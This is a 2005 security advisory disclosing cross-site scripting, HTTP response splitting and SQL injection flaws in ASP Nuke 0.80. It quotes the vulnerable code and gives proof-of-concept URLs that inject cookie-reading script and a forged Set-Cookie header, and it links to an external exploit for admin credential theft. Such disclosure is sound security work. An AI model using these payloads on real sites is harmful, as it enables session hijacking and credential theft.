M4DR007-07SA.txt

`M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80  
  
Published: 26 16 2005  
Released: 26 16 2005  
Name: ASP Nuke  
Affected Systems: <= 0.80  
Issue: Cross-Site Scripting, HTTP Response Splitting, SQL Injection  
Author: Alberto Trivero  
Vendor: http://www.aspnuke.com/  
  
  
  
Software Description  
  
***********  
  
  
"ASP Nuke is an open-source software application for running a community-based web site on  
a web server. By open-source, we mean the code is freely available for others to read, modify  
and use in accordance with the software license. ASP Nuke is an extensible framework that  
allows you to upgrade and add applications to the website quickly and easily. It uses a  
modular architecture allowing others to rapidly develop new modules and site operators to  
re-organize the layout and navigation for their site."  
  
  
  
Cross-Site Scripting (XSS)  
  
***********  
  
  
Let's look at code from /module/account/register/forgot_password.asp at line 33 and 103:  
  
<?  
...  
sEmail = steForm("Email")  
...  
<TR>  
<TD class="forml">  
<% steTxt "E-Mail" %> (req)<BR>  
<INPUT TYPE="text" NAME="email" VALUE="<%= sEmail %>" SIZE="22" MAXLENGTH="80" class="form">  
</TD>  
</TR>  
<TR>  
...  
?>  
  
As we can see there isn't any control on the 'email' parameter when the board get it's value.  
Since the value of the parameter is put in the HTML page as is, an attacker can do an XSS  
attack with an URL like this:  
  
http://www.example.com/module/account/register/forgot_password.asp?email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
On the same line there are others parameters that aren't properly sanitised. These are some  
PoC URLs:  
  
http://www.example.com/module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://www.example.com/module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://www.example.com/module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://www.example.com/module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://www.example.com/module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://www.example.com/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://www.example.com/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://www.example.com/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://www.example.com/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
  
  
HTTP Response Splitting  
  
***********  
  
  
Let's look at code from /module/support/language/language_select.asp at line 31:  
  
<?  
...  
If steForm("action") = "go" Then  
' make sure the required fields are present  
If Trim(steForm("LangCode")) = "" Then  
sErrorMsg = steGetText("Please select a language from the list below")  
Else  
' redirect to the language administration  
Response.Redirect "tran_list.asp?langcode=" & steEncForm("LangCode")  
End If  
End If  
...  
?>  
  
When the redirect, that this piece of code do, happend, it's possibile to do a CRLF injection  
attack thanks to an unexisting sanitisation. This is a Poc URL:  
  
http://www.example.com/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue  
  
These are examples of HTTP headers:  
  
Request:  
POST /module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue HTTP/1.0  
Accept: */*  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)  
Host: www.aspnuke.com  
Content-Length: 90  
Cookie: ASPSESSIONIDSCRDCDAD=NMDFFFJBFMLBNDNFJDFGAGPP;LANGUAGE=US  
Connection: Close  
  
Response:  
HTTP/1.1 302 Object moved  
Server: Microsoft-IIS/5.0  
Date: Sun, 15 May 2005 11:31:37 GMT  
Pragma: no-cache  
Location: tran_list.asp?langcode=trivero  
Set-Cookie: some=value  
Connection: Keep-Alive  
Content-Length: 121  
Content-Type: text/html  
Expires: Sun, 15 May 2005 11:30:38 GMT  
Cache-control: no-cache  
  
  
  
SQL Injection  
  
***********  
  
  
Let's look at code from /module/support/task/comment_post.asp at line 36 and 75:  
  
<?  
...  
nTaskID = steNForm("TaskID")  
...  
If sErrorMsg = "" Then  
' prevent dup posting here  
sStat = "SELECT TaskID " &_  
"FROM tblTaskComment " &_  
"WHERE TaskID = " & nTaskID & " " &_  
"AND Subject = '" & Replace(sSubject, "'", "''") & "' " &_  
"AND Body LIKE '" & Replace(sBody, "'", "''") & "'"  
...  
?>  
  
As we can see there isn't any control on the 'TaskID' parameter when the board get it's value.  
Since the value of the parameter is put in the SQL query without sanitisation, an attacker  
can do an SQL injection attack. I've made an exploit for this vulnerability that it's able  
to recover the admin's username and the SHA256 hash of his password available at this address:  
http://albythebest.altervista.org/aspnuke.pl  
  
  
  
Solution  
  
***********  
  
  
The vendor has been contacted many times but a patch was not yet produced.  
  
  
  
Alberto Trivero - [email protected]  
Come cheer us at #security-it on Freenode ( irc.freenode.net )  
(C) 2005 Copyright by Madroot Security Group`